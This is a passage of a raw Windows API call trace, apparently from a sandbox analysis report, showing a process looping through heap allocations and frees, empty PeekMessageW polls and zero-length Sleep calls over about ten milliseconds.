wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.724] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.724] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.725] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.725] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.725] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.725] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.725] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.725] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.725] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.725] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.725] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.725] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.725] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.725] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.725] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.725] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.725] Sleep (dwMilliseconds=0x0) [0268.725] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.725] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.725] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.725] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.725] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.725] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.725] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.725] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.725] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.726] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.726] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.726] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.726] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.726] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.726] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.726] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.726] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.726] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.726] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.726] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.726] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.726] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.726] Sleep (dwMilliseconds=0x0) [0268.726] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.726] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.726] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.726] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.726] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.726] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.726] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.726] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.726] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.727] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.727] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.727] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.727] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.727] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.727] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.727] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.727] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.727] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.727] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.727] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.727] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.727] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.727] Sleep (dwMilliseconds=0x0) [0268.727] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.727] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.727] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.727] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.727] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.727] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.727] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.727] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.727] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.727] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.728] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.728] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.728] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.728] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.728] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.728] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.728] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.728] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.728] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.728] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.728] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.728] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.728] Sleep (dwMilliseconds=0x0) [0268.728] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.728] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.728] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.728] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.728] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.728] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.728] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.728] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.728] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.728] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.728] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.729] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.729] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.729] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.729] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.729] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.729] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.729] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.729] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.729] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.729] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.729] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.729] Sleep (dwMilliseconds=0x0) [0268.729] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.729] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.729] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.729] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.729] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.729] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.729] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.729] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.729] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.729] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.729] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.729] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.730] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.730] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.730] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.730] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.730] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.730] Sleep (dwMilliseconds=0x0) [0268.730] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.730] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.730] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.730] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.730] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.730] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.730] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.730] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.731] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.731] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.731] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.731] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.731] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.731] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.731] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.731] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.731] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.731] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.731] Sleep (dwMilliseconds=0x0) [0268.731] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.731] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.731] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.731] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.731] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.731] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.731] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.731] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.731] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.731] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.731] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.731] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.732] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.732] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.732] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.732] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.732] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.732] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.732] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.732] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.732] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.732] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.732] Sleep (dwMilliseconds=0x0) [0268.732] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.732] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.732] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.732] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.732] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.732] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.732] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.732] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.732] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.732] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.732] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.732] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.732] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.733] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.733] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.733] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.733] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.733] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.733] Sleep (dwMilliseconds=0x0) [0268.733] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.733] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.733] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.733] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.733] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.733] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.733] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.733] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.734] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.734] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.734] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.734] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.734] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.734] Sleep (dwMilliseconds=0x0) [0268.734] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.734] HeapFree (in: 